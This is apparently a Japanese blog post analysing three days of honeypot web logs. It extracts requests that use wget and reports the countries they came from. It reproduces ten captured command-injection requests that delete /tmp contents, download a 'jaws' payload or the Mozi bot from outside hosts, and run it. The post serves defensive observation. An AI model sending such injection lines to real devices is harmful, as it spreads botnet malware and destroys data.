ハニーポットのログを自動集計してcsvファイルに保存し、自分のPCに転送するスクリプトを作成していました。
しかし、ログ作成部分のスクリプトはエラーで最後にログファイルをリフレッシュする部分は動くのでちょうどログファイルだけ消えるという珍事によりログ分析ができていませんでした。
そのため、現時点で3日分のログしか溜まっていません(えっ!?
それでも、すでに数千アクセス来ているのでログを見ていこうと思います。
今日は、wgetしてくる攻撃をピンポイントで抽出します。
ログファイルを書きコマンドで抽出します。[1]
結果
検索件数:10件
[2022-03-15 13:14:01+0900] 114.226.253.242 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 200 False
ipアドレスの国:中国
[2022-03-15 14:34:46+0900] 203.150.51.169 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+209.141.59.94/jaws;sh+/tmp/jaws HTTP/1.1" 200 False
ipアドレスの国:タイ
[2022-03-16 06:10:01+0900] 131.0.140.63 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 200 False
[2022-03-16 15:57:33+0900] 124.152.185.167 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+209.141.59.94/jaws;sh+/tmp/jaws HTTP/1.1" 200 False
ipアドレスの国:中国
[2022-03-16 17:58:34+0900] 189.124.119.77 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 200 False
[2022-03-16 18:39:56+0900] 41.237.6.136 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+%20jswl.jdaili.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 200 False
ipアドレスの国:エジプト
[2022-03-17 09:28:28+0900] 41.44.63.246 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+%20jswl.jdaili.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 200 False
ipアドレスの国:エジプト
[2022-03-17 15:03:33+0900] 45.224.170.52 blank:80 "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.224.170.52:57274/Mozi.m+-
[2022-03-17 18:09:42+0900] 187.144.73.98 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 200 False
ipアドレスの国:メキシコ
[2022-03-17 19:15:47+0900] 106.253.189.123 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 200 False
ipアドレスの国:韓国
ipアドレスの国を調べるとさまざまな国から攻撃を受けています。
中国、アメリカ、アフリカ、タイ、韓国とバラエティに富んでいます。
今回の攻撃は、wgetでマルウェアかなんかをダウンロードして仕込もうとしています。
wgetの前に必ずcd+/tmp;rm+-rf+*;があるのは、アタックした痕跡を消しにかかっています。
ここらへんはもうテンプレの攻撃でしょうね。
しかも、wgetにはjawsの文字列が必ずあります。
これはHTTPのコマンドインジェクションのようです。[2]
こんな感じでハニーポットのログ分析で攻撃の観測をレポートしていきます。
参考記事
[1] grepコマンドの詳細まとめました【Linuxコマンド集】
[2]複数の脆弱性を利用してルータやデバイスを狙うボット型マルウェアの新亜種を確認 | トレンドマイクロ セキュリティブログ
ハニーポット関連書籍
ハニーポットを作ってみたい場合は下記書籍を参考にすると良いと思います。